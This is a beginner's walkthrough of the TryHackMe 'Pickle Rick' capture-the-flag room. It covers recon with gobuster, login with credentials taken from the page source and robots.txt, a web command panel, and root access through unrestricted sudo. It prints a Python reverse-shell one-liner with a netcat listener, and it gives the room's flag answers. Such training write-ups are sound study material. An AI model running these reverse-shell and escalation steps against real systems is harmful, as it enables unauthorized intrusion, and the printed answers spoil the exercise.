Try Hack Me: Pickle Rick Walkthrough
A Rick and Morty CTF. Help turn Rick back into a human!
Hello!
This is a easy CTF of TryHackMe.
You can find the room in the link below:
I really recommend this challenge to those who are starting, there are a lot to learn and I had a lot of fun completing it and writing this text! xD
Task 1 - Pickle Rick
To solve this CTF, we need to follow the usual steps of whatever penetration test.
Check the list below, I simplify the steps to this specific task in only 3 stages:
- Reconnaissance;
- Exploitation;
- Privilege Escalation.
So…
Let’s walk step by step! xD
Reconnaissance
Look for useful information following the next steps and take note of everything you find useful.
Note that not every information is really useful, but I write it here because the process can be helpful in other challenges.
Step 1: Take a look in the source code and see if you find something interesting.
We can see a Username named: R1ckRul3s
Save it!
Step 2: Always see robot.txt.
We found some interesting text, let’s take note and see if we can use it later.
Maybe this is some password we can use.
Step 3: Now let’s run a directory bruteforce.
I used gobuster but you can use the tool you prefer.
gobuster -u http://”Target IP” -w “path to wordlist” dir
I chose a small wordlist since this is a simple CTF, but you can use some more complete ones if you like.
We got the directory assets, maybe it can be useful later.
Step 4: Find the login page.
Since we have found a User, probably there is a login page.
I manually try login.php and it works.
Now we can try to log in here.
Exploitation
Step 5: Log in.
Let’s log in using the credentials we found before.
User: R1ckRul3s
Password: Wubbalubbadubdub
That’s it! We are in!
And it seems like we found something interesting. A command panel that executes shell code directly through the site.
You can test it by running “ls”.
There is a intesting file Sup3rS3cretPickl3Ingred.txt and it seems like one of the ingredients is inside it.
Let’s cat it to see what we find.
There is something filtering some commands executed through the site.
To bypass it, we can try to open a reverse shell.
Step 6: Open a reverse shell with the command panel.
First we need to configure the server side that will receive the connection, our machine in that case.
To do it, use netcat to listen on port 1234.
nc -lvnp 1234
In the client side (Browser) that will connect to our machine, there are a lot of scripts to do that by the website, you can choose.
Take a look at link below and see some reverse shell script options to run on command panel:
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
I used the python script
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“Your IP”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Remember to change “python” to the current version “python3”.
We got it! Connection received.
Step 7: Cat the file.
Now we can cat the file and see the first ingredient.
Cat Sup3rS3cretPickl3Ingred.txt
We got the first one!
1.1 — What is the first ingredient Rick needs?
Answer: mr. meeseek hair
Step 8: Look for another user.
Just walk around and see if you find some directory where the ingredients can be.
You will find a rick’s directory with the second ingredient.
Step 9: Cat it and find the second ingredient.
1.2 — What’s the second ingredient Rick needs?
Answer: 1 jerry tear
Privilege Escalation
It’s time to escalate privilege and see if we can find the last ingredients as root.
Step 10: See the sudo permissions for the current user.
Sudo -l
It seems that we have unlimited power using sudo. hehe
So we can become root with sudo.
Step 11: Run “sudo su” and become root.
sudo su
Now we are root! xD
Step 12: Take a look at the root directory.
Step 13: Cat 3rd.txt
And we got the last ingredient!
1.3 — What’s the final ingredient Rick needs?
Answer: fleeb juice
That’s it! xD
Thanks for your attention.
I hope this simple walkthrough can be helpful to you in some way.
If you see some error or have any other tips, let me know! =D
Bye!